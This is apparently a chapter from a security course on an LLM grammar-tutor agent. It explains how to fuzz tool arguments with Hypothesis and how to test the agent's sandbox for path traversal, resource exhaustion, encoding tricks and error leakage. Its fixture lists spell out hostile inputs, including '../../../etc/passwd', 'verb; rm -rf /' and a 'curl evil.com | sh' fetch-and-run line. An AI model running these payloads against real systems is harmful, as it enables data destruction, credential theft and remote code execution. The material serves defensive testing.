English · Español
04 — Fuzzing tool args and reviewing the sandbox¶
🇪🇸 El fuzzer no piensa como un atacante; genera entradas aleatorias y deja que el sistema falle. Combinado con un sandbox (Phase 32) que limita lo que las tools pueden hacer, las dos capas se compensan: el fuzzer encuentra entradas inesperadas, el sandbox limita el daño cuando alguna se cuela.
Why fuzz when you have schemas¶
Phase 31 defines tool argument schemas (JSON Schema / Pydantic). Phase 30 enforces output schemas. Both are whitelists of valid shapes. So why fuzz?
- Schemas describe shape, not semantics. A
path: strfield passes the schema as"../../../etc/passwd". Averb: strfield passes as"work; rm -rf /". The schema is satisfied; the behavior is not. - Schemas are written by humans. Humans miss edge cases: Unicode normalization, NULL bytes, very long strings, integer overflow, empty strings.
- Fuzz finds violations the writer didn't think of. That's the whole point.
The fuzzer is downstream of the schema: it generates inputs that pass schema validation but might still violate behavior expectations.
Hypothesis: property-based testing as fuzzing¶
hypothesis is the standard Python library for property-based testing. It shrinks inputs to minimal failing examples, which makes findings actionable.
Basic shape for the grammar tutor:
from hypothesis import given, strategies as st
@given(
verb=st.text(min_size=1, max_size=50),
tense=st.sampled_from(["infinitive", "present_simple", "past_simple",
"past_participle", "future_will", "future_going_to"]),
person=st.sampled_from(["1sg", "2sg", "3sg"]),
)
def test_agent_tool_args_are_safe(verb, tense, person):
result = agent.invoke({"verb": verb, "tense": tense, "person": person})
assert result.status in {"ok", "rejected"}
assert "rm -rf" not in result.diagnostic # no command leakage
assert no_path_escape(result) # no fs access outside KB
What Hypothesis does:
- Generates random
verbstrings from thetext()strategy — including Unicode, control chars, very long strings. - Runs the test. If it fails, shrinks the input: tries to find the smallest
verbthat still fails. - Persists the failing example to
.hypothesis/examples/so the same failure is retried on every run.
The result of a 60-second fuzz run is, ideally, at least one failing example — confirming the agent has at least one corner case its schema didn't catch.
Strategies tailored to the threat model¶
Generic strategies (st.text()) find some issues. Targeted strategies find more:
malicious_paths = st.sampled_from([
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"/dev/null",
"/etc/shadow",
"file:///etc/passwd",
"\\\\server\\share",
])
command_injection = st.sampled_from([
"verb; rm -rf /",
"verb && curl evil.com | sh",
"$(whoami)",
"`id`",
"verb\nmalicious",
])
st.one_of(malicious_paths, command_injection, st.text())
These are adversarial fixtures mixed into the generation pool. The fuzzer becomes part property-based, part dictionary-driven.
What "schema violation" means here¶
The Phase 37 DoD requires the fuzzer to find ≥1 schema violation in 60 seconds. "Schema violation" means:
- The agent's tool response doesn't match its declared output schema (Phase 30).
- The agent raises an unexpected exception (not
ValidationError, notToolRejected). - The agent's response contains a string that looks like leakage from a tool error (e.g., a filesystem path the user couldn't have known).
The fuzzer doesn't need to produce a security incident — it needs to produce a behavioral surprise. Surprises are the leading indicator of latent vulnerabilities.
The Phase 32 sandbox: what we're reviewing¶
Phase 32 wraps tool execution in a capability-restricted environment:
| Capability | Granted? | Mechanism |
|---|---|---|
Filesystem read, data/kb/grammar-rules/ |
Yes | Path canonicalization + prefix check |
| Filesystem read, anywhere else | No | Same check rejects |
| Filesystem write | No | Tools have no write APIs |
| Network access | No | No requests/httpx imports allowed in tool code |
| Subprocess spawn | No | subprocess, os.system, os.popen blocked by audit hook |
| Arbitrary Python eval | No | No eval, exec, compile in tool code |
| CPU time | Limited | signal.SIGXCPU after 5 seconds wall-clock |
| Memory | Limited | resource.setrlimit(RLIMIT_AS, ...) |
Phase 37's job is not to build this sandbox (Phase 32 already did) but to test it adversarially:
- Try path traversal — does canonicalization actually canonicalize?
- Try CPU exhaustion — does the timeout fire?
- Try memory exhaustion — does the rlimit hold?
- Try shell metacharacters — do they reach a shell? (They shouldn't; there's no
shell=Trueanywhere.) - Try side channels — DNS resolution, timing oracles.
Each test that the sandbox passes gets a regression entry. Each test it fails becomes the lead story of the report.
Sandbox bypass categories to test¶
From the literature on sandboxing, the categories most often missed:
- TOCTOU (time-of-check, time-of-use). Path is canonicalized at check time; an attacker swaps a symlink before use. Hard to exploit in this single-process setup but worth a test.
- Encoding tricks. UTF-8 normalization, URL-encoding, double-encoding.
..%2f..%2fvs../... The canonicalizer must normalize before the prefix check. - Case folding. Windows-style case-insensitive filesystems:
DATA/KB/...vsdata/kb/.... (Less relevant on Borja's Fedora box but worth a one-line test.) - Resource exhaustion as DoS. Even if no escape, can a tool argument cause a 30-minute hang? The 5-second timeout should catch this.
- Error-message leakage. A failed tool call returns an error string. If that string contains
/home/borja/.../secrets, the sandbox failed to redact.
The lab/03-tool-abuse-and-fuzz.md walks through each as a concrete test.
What the sandbox does not protect against¶
A blunt list:
- Logical bugs in the agent itself. If the agent's tool routing has a bug that calls the wrong tool with the wrong args, the sandbox doesn't help.
- Information that the tool is supposed to return. A KB lookup tool returns KB content; if a poisoned chunk is in the KB (Lab 01), the sandbox lets it through because it's a legitimate read.
- Compromise of the sandbox itself. If
signal.SIGXCPUis monkey-patched by attacker code that already runs in-process, the timeout is moot. The sandbox assumes the agent code path is trusted; only tool arguments are untrusted. - The model. The sandbox wraps tools, not the LLM forward pass. A model that hallucinates a malicious response is a separate problem (Phase 30 schema enforcement).
This list belongs in the THREATS.md rows Borja writes during phase execution: the sandbox's coverage and its gaps both need documentation.
The two-layer story¶
Putting the four theory chapters together:
- Boundary layer: schemas (Phase 30) define what's allowed in/out.
- Sandbox layer: capability restrictions (Phase 32) limit blast radius if boundary fails.
- Audit layer: redacted logs (Phase 34) catch the attempt without storing the payload.
- Tripwire layer:
MANIFEST.jsonverification (Phase 37 lab 04) catches tampering.
Fuzzing exercises layer 1 and probes layer 2. It does not test layer 3 or 4 — those need their own checks.
One-paragraph recap¶
Schemas describe shape; fuzzers find shape-passing inputs that nonetheless misbehave. hypothesis plus a small dictionary of malicious payloads is the cheapest, highest-yield testing tool in the phase. The Phase 32 sandbox is the layer that limits the damage when the fuzzer's findings escape the schema; Phase 37's job is to probe the sandbox adversarially, not to build it. The DoD's "≥1 schema violation in 60 seconds" is set deliberately low — even a carefully designed schema has corner cases, and not finding one in 60 seconds is itself a finding worth investigating.
Next: lab/00-prompt-injection-direct.md — the "pirate" payload and its mitigation.